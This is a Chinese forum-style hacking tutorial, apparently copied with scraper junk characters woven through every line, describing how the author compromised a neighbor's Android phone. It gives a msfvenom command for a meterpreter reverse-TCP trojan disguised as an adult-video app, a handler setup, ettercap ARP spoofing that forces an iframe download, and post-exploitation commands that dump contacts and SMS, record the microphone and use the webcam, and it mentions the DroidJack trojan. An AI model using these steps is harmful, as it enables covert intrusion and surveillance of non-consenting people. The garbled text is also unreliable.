|
1 Z' X4 m& h( ?0 G; \* P9 N8 ~ 五、msf+ettercap入侵邻居安卓手机 - z6 S* K5 ]% u6 k
; y I# `2 \3 c9 H9 x
O2 s% E. m4 t4 ^+ j1 s
首先启动msf
. g% {' y" D: }. l! y5 F" Q3 k
" A2 v4 C. j8 h" Z& v6 A0 N1 d5 r) w8 N$ m/ G
先用kali生成一个安卓木马,如下命令:
8 d1 c2 m% l6 X1 L9 m6 m, T2 R 1 y+ ^3 D% P( }, ~3 ]
" j* t% X5 y F |, {9 f7 J# Y7 i Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk ) P, a, T) \+ W. \; e6 g
8 O& ?2 k; q' s) }# y: o- v* X5 e( `+ v5 \6 _
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
5 H) K' I4 S i/ }1 t& `
i; ^7 ]+ d$ V& D' b, F6 m, H
然后进入msf
9 I3 y: v/ s& i" r* K 0 |% s) _2 X; D: C1 p. G$ o
9 W4 u$ O/ m; d4 x use exploit/multi/handler
8 H) M. T. _9 k * l+ [9 {0 n* h& Y( ^. Y- b
9 {' F* E" Q/ Z3 q. r( P4 v set payload android/meterpreter/reverse_tcp - }$ O+ [/ r% x5 E0 K( i2 \5 Z
% s" [1 c# ?3 Z& l2 y8 Z
7 V6 @: J5 \# _4 ` set LHOST 192.168.0.109 //ip为kaili的ip
1 P7 d( k4 U# ]5 n2 S ) @% U r8 j' m* N4 h% |
1 U/ b+ u. p: m; O% n" E9 I2 m5 y" H set LPORT 44444 //端口一定要与前面生成的木马的端口一致
2 m# _. n9 f1 w* X" I1 @ ( P5 ] y2 j4 a. f6 [
' w' R' ^" f4 b& o { Exploit
% d/ [- C s0 f) C' t, O7 d" @+ ~ 5 t) s) e( Z6 X% B1 `
, Y2 e; a4 _/ j: K
. M; B: q' p* J) `( Z: W* y
- i4 X& y, N i6 c8 R, ]$ D
. ?7 [& i9 H/ n' G( J 下面我们开启ettercap -G 4 j$ a o1 [* I9 ~ O/ i
, i0 n2 W! O+ G! S
Y6 |0 J7 g4 Y* p" l, z 我物理IP为
' b" }3 S9 A4 q. ? P ' A3 c! C" K0 i/ k4 G
4 n( B" c" N- ]# L5 f
, E" X3 a( u, K7 ?6 K1 Y5 I# k8 Y
/ Z. d6 a. C( J0 [% \0 g$ }4 g3 G% t& C/ y) ?3 `4 q7 s0 I
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, " Z8 r5 C* f+ ?( E% v9 F
, p8 ~ }% n/ R' L' Z( A! q
% K9 D, }$ Y7 G 下面我们来设置一下
/ S: g2 J8 `; q! o$ l* B
6 \4 p9 K( W7 Z7 d* Z0 o1 v1 Y, P$ j
4 Q& J+ G. T) x& m: O4 s* B + q9 I& f {3 [8 M
$ m' e* D. F& ?) z/ N3 A, t
4 e1 Y* C' G4 g _- x4 O- E 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, # B* l$ l( e6 w
' N) T- W5 x% S3 V2 C
; O+ V. i/ R& ~& z R: A
8 h% o8 l' [. G& } ; m" W I( e8 K. [5 x1 V j
( L5 {2 P; v. L. g5 J: v7 A* L& h/ G
M; Z6 U+ {* A4 X
5 p! f- Q, [/ h+ K2 j" l' h' q+ @& P7 E+ }5 r
) e: Z7 s6 T3 r4 [4 ` D8 z0 k( k
& g/ n- a2 S# i2 }1 ^0 V! d" n
. \4 I+ Z: D- O6 v' ~* c& O$ R- w" { 3 U* o8 W5 D4 }5 @- K$ N0 @ O9 w
+ |" P9 W4 i" S- d5 z- N1 e( p$ J9 R! g
+ i# ], b5 M* e3 e$ I & p( L) e0 G5 \- d% `* I$ H( ^. S
3 K) L( p9 ?8 i# }5 A
% u8 B6 C3 M0 X5 d4 |
' U }) M6 C' O' p; _! R* b
. ?! r: i/ ]. j1 n
& F) \) Q3 d0 a' Z ( p" k, r/ h5 V
! Q! F3 O( G3 }+ v- m' F- j# i
+ ?4 J6 k5 ~5 ^* n; u9 U 5 I6 H' V( G8 D& g
4 W) e5 G6 ]: N, X. h
9 u9 u: _) u }" Q1 h 4 g4 T. S& J6 r/ ^- W3 ]3 b
1 n0 Q: Z) x8 L: G" ~) p! t9 F
l: [" h8 b& ^ b
3 m7 M* h. H4 Q
; ?6 H7 h; k1 {* T " L; \+ |. j& C' {( G
+ S5 M2 q% j( @. Y
j" I }# K* J, C 9 ~) S% {/ P; ?- }/ i0 d. E
2 W! n: L8 y+ p7 Z) r0 D/ t, ` k
. k4 P- D( W- r
J/ e8 m* _% g X
' H7 _0 T0 e V+ B! K: W
1 P* Y9 U' ]. |( }+ \ K) ` 下面我们开始攻击 $ X; L" x: ? {3 i% C' `* M) C$ C- y
8 S2 r! h1 L2 L
9 e! ~( P' i1 M2 O
8 M% j' h* R# `: @# G, u: e0 X , i: k5 Z! a9 l# C$ x0 j
+ G. c+ t' b0 W Q+ j 3 O6 ^0 ~. H- j- H2 i e: K9 G z5 R
2 x9 V' o6 U' ^+ u
9 z7 w8 X- f& U) X4 a6 R0 `
2 k: R4 \: |4 E3 u* {0 O ) t% Q( ]/ Q! _( h% W
4 A. K- U9 g+ F
6 D* Q5 F/ @ L( Y 6 N: \! B- v N7 J0 F, M% k
+ R! q+ n& m% x/ F7 g$ S% N ) J! i: f. p( N. W$ q( @7 g
* k2 u; j0 t- q |, j* W* n3 Y
: h% \& {) A g/ m/ L: ?% c 大概过了5分钟多,发现反弹成功了
* k( F& Z0 B# f$ q) c+ A/ q
, t! A# L$ F) K- J$ i
8 y+ l z4 w( A, S+ D0 M
; t- y( m3 T) ~ t2 [6 o: ]( R
8 l3 y( S1 l9 A* [# z5 k' x
( I9 Y3 U5 M5 v: J
5 {, W& s2 _, w6 A8 Z5 i( f6 E n
) U3 E* \5 N( I- \) k% @4 m1 p0 L: t4 E$ U' t' J" O
/ z* u& E. W, Z) s2 \. p9 L ; D D3 k7 V* S% t
: Y/ w" S; b, n1 k1 x
% i* ?' ?( Y. _3 P# m2 z7 p $ Q" s4 w2 A4 W: V
7 I9 y u' O* m. J
8 [$ l) [8 u, @( M1 W2 h3 V+ t: F5 W $ b" }# M% F7 U% e! W2 s$ B
! c9 E: ^1 |) u1 x+ V2 L
0 W. I! k; L4 B5 C
" Q: }% n" V: u) C
0 l' I$ a2 }. @4 @) r# j' p 8 Q- _7 D: l- i7 u2 y/ I4 B6 x
7 {; K( N1 `8 ^! T+ b
9 i. M# S( A1 c; F% y7 t; H& k 执行命令
5 e+ V2 {4 Y1 b/ S* L & j7 [) J- ?" Y
7 O- d+ S5 r+ Z. f( z - q0 `5 p% S5 a0 z& U5 N8 h. a7 p
; u8 {) K a1 {4 ?$ L) b( t, s6 a
dump_contacts --》这个是导出电话
7 S" H4 O% f# ]! } ) |6 I4 j1 ]$ O( o, m9 g ?
4 D! M1 H! h9 T# |# j+ c8 ~* O dump_sms --》这个是导出信息 * J# d" n" a* R" V6 l
- J# M B& s& U
/ d* `) @; C, |4 ~ record_mic Record audio from the default microphone for X seconds 0 ?+ w, O. ^. Y) W
8 a% v# m( }5 ~/ B( `
! `- A. I- }; Q; `1 P, A webcam_chat Start a video chat - r4 i% G( L/ ^' w+ \
/ ~* _0 a& t# Q8 Q* ^& B6 s
5 l6 i, A( @$ w2 R9 r- H
webcam_list List webcams
/ Z& c$ D# i. Q6 V9 Q " |& I, I5 K" H! A! U4 o
0 Z- {, }" A; b+ p
webcam_snap Take a snapshot from the specified webcam 4 T) J5 ^% _: J* G( ~! J
4 x) y8 H: }( q2 M$ {5 b3 [% ?+ c
" T; K; Q4 |( W. `' U$ ]0 y! d5 \
webcam_stream   lay a video stream from the specified webcam
) ?1 c$ M: {! ~+ c- q 6 c- C+ M2 X' W: E. a" G4 N, V$ J
$ F9 k; j: A/ X7 `2 G
) G; @3 g8 t, V7 k9 p/ D
. m3 e. l$ K: Z7 R; V" _5 f
T* e9 a- ~( e+ j! Q
1 j* b2 `% n& [# u; y8 w) {
6 K5 }6 a2 K+ R4 S) O" ~, c
2 }: y8 i+ }' C/ r1 i2 o 我们打开看一下电话薄,
) ?: j! Y3 g: W/ {
: @& {3 a4 }" v' s+ H8 i$ M$ r
& Z; e8 U( U8 F5 i2 R- ^ 6 o ^7 E4 }8 u0 R; A' Z
3 l' a7 L5 J9 e9 \. b! x8 _2 w' z) \
9 @! X% ]4 \& Q$ {- F9 N A0 r
: e! j3 g* W( r5 C+ D / a( u1 V8 r8 q5 Q
* J! E8 n. m- N: e& v4 G; P9 Z 4 Q2 g0 q3 a' `* `# k3 n
2 v: t% ^ {# [6 L5 n8 M6 E. p
R7 k) Z+ U; ^4 h- l; L0 w8 w
3 s/ i j$ W; L$ P% ` M4 `2 Z o
" y% N2 V3 p% K) W6 K# J6 U' }3 z7 m/ |/ X% b* ^0 u
9 D2 ~- V' M$ g& |7 s( k
$ L$ o' a/ Z8 ]# i& b# u9 P* r5 k' r9 k5 b0 i
) ?, Q, B0 x2 Z/ y
' {4 w8 J; d* {) s7 Y. S
- j% m2 Q9 h8 E4 }( m 我们同时欺骗成DroidJack木马,使用方法如图:
2 X- w. k. H5 Q6 Y # |+ ^3 |4 G- f: r# r! v- v
! P8 e0 R6 g8 H6 N4 p
9 y" n& \. z9 {8 m
+ Z( C% w* W7 g9 a) d
1 C+ p; \1 `% z6 u3 }, f5 p$ ] I1 i' y ; I3 x8 K- D" t+ l
# Q7 b ]0 \- `$ f2 e
' U( w. G& i6 l. i) K0 d 8 D# }+ u2 y9 Y- I- R
2 b) l, ]2 z, x q6 @6 P% M" R& S$ W8 d% F) t; l( T
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
% N. h; Z/ d# q G0 q( \ 8 d2 P/ h7 B( [' H% v
" V- V3 u/ R1 N: u
1 C9 _. ]/ ~# m+ w [7 h1 ]: k* O
1 ^7 J v- A# c5 y/ j1 w! H" c& X7 t
3 ?0 \( D" G% e# I: w ' Y3 F) D% m5 k( J" y
4 Q! o9 p8 I* V/ m" @6 v3 e0 B$ \- S$ W& o
+ V' y3 G j7 E! i6 J7 B8 @
! }" [6 w6 ?+ l6 r+ Z* V0 q% h
/ e& h3 t/ T, S' C/ K8 y% s ~  & l! _ P2 o6 ^+ D- f8 t
f% `, d) K, B: q9 g% b: u. n {. @0 o+ f5 w# k/ N; g! r) \
8 O. @- H% e9 ]% C% I
|